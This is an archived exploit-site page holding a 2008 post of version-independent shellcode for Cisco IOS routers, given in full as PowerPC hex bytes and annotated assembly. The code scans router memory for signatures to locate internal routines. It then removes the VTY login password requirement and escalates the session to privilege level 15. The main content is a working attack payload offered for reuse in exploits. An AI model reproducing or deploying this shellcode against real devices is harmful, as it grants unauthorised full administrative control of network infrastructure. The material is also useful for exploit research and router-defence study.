exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

ios-shellcode.txt

ios-shellcode.txt
Posted Aug 22, 2008
Authored by Andy Davis

Version-independent IOS shellcode that does not require hard-coded IOS addresses.

tags | shellcode
systems | cisco
SHA-256 | a8749a2b8fbe30c8e89d87a164b28543061e8b5d42e9fadf68560774e487a883

ios-shellcode.txt

Change Mirror Download
Hi,

One of the biggest problems with IOS exploitation is that on every
different version of IOS, the addresses required to execute useful
shellcode are different. Therefore, hard-coded addresses were inserted
into shellcode and this made exploits very version-dependent.

I have been working on a way around this and here is the first
iteration of just one of the solutions to the problem. It uses a
search routine to locate 4-byte signatures that occur near references
to the required addresses within the IOS image located in the "text"
memory region. The addresses are then recovered from memory and used
within the shellcode.

Cheers,

Andy



# Version-independent IOS shellcode, Andy Davis 2008
#
# No hard-coded IOS addresses required
#
# The technique uses 4-byte signatures near references to the
# required addresses within the IOS "text" memory region.
# The addresses are then recovered from memory and used within the
# shellcode.
#
# This is beta 1 - this code can be highly optimised I'm sure,
# for example, the search routine could be reused and the number
# of registers cleared could be reduced - but it works :-)
#
# As this is the first iteration of this shellcode, I'm not making any
# claims as to exactly how portable it is - it has been tested on a
# number of IOS images and therefore, the concept has been demonstrated.
#
# Various simple techniques have been used to ensure that there are
# no nulls in the shellcode


.equ sig_vty, 0x7F60B910 # signature for vty_info
.equ sig_kill, 0x639C8889 # signature for terminate()
.equ start, 0x80018001 # start of the search


3c 80 80 02 lis r4,-32766
38 84 80 01 addi r4,r4,-32767 # the start address for the search
3c a0 63 9d lis r5,25501
38 a5 88 89 addi r5,r5,-30583 # the "sig_kill" search signature
38 e7 01 94 addi r7,r7,404 # add 4 without introducing nulls
(technique used throughout the shellcode)
38 e7 fe 70 addi r7,r7,-400
7c c4 38 6e l1: lwzux r6,r4,r7
7c 06 28 40 cmplw r6,r5 # is address contents equal to signature
40 82 ff f8 bne 18 <l1> # no, keep searching
7c a5 2a 78 xor r5,r5,r5 # yes, found "sig_kill"
38 84 01 e8 addi r4,r4,488
38 84 fe 70 addi r4,r4,-400
7c c4 28 2e lwzx r6,r4,r5
38 a5 01 98 addi r5,r5,408
38 a5 fe 70 addi r5,r5,-400
7c c6 28 30 slw r6,r6,r5
7c c6 2c 30 srw r6,r6,r5
38 c6 ff ff addi r6,r6,-1 # r6 now contains the offset of
terminate() from here
7c 84 32 14 add r4,r4,r6 # add offset to current address
7c 8a 23 78 mr r10,r4 # address of terminate() saved into r10
7c e7 3a 78 xor r7,r7,r7
3c a0 7f 61 lis r5,32609
38 a5 b9 10 addi r5,r5,-18160 # the "sig_vty" search signature
38 e7 01 94 addi r7,r7,404
38 e7 fe 70 addi r7,r7,-400
7c c4 38 6e l2: lwzux r6,r4,r7
7c 06 28 40 cmplw r6,r5 # is address contents equal to signature
40 82 ff f8 bne 64 <l2> # no, keep searching
38 84 01 a8 addi r4,r4,424 # yes, found "sig_vty"
38 84 fe 70 addi r4,r4,-400
7c e7 3a 78 xor r7,r7,r7
7c a4 38 2e lwzx r5,r4,r7 # get two MSBs
38 a5 ff ff addi r5,r5,-1
7d 08 42 78 xor r8,r8,r8
39 08 01 a0 addi r8,r8,416
39 08 fe 70 addi r8,r8,-400
7c a5 40 30 slw r5,r5,r8 # shift MSBs into the right place (XXXX0000)
38 84 01 94 addi r4,r4,404
38 84 fe 70 addi r4,r4,-400
7c c4 38 2e lwzx r6,r4,r7 # get two LSBs
7c c6 40 30 slw r6,r6,r8
7c c6 44 30 srw r6,r6,r8 # shift LSBs to clear the MSBs (0000YYYY)
7c a5 32 14 add r5,r5,r6 # add the two together (XXXXYYYY)
38 a5 01 08 addi r5,r5,264 # move to the 66th element of the
array (VTY 0 - see IOS "systat" command)
7d 05 38 2e lwzx r8,r5,r7 # r8 = vty_info
90 e8 01 74 stw r7,372(r8) # Remove the requirement to enter a password
38 e7 ff ff addi r7,r7,-1
39 08 09 1a addi r8,r8,2330
90 e8 04 ca stw r7,1226(r8) # privilege escalate to level 15
7c e3 3b 78 mr r3,r7
7d 49 03 a6 mtctr r10
4e 80 04 20 bctr # terminate "this process"

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close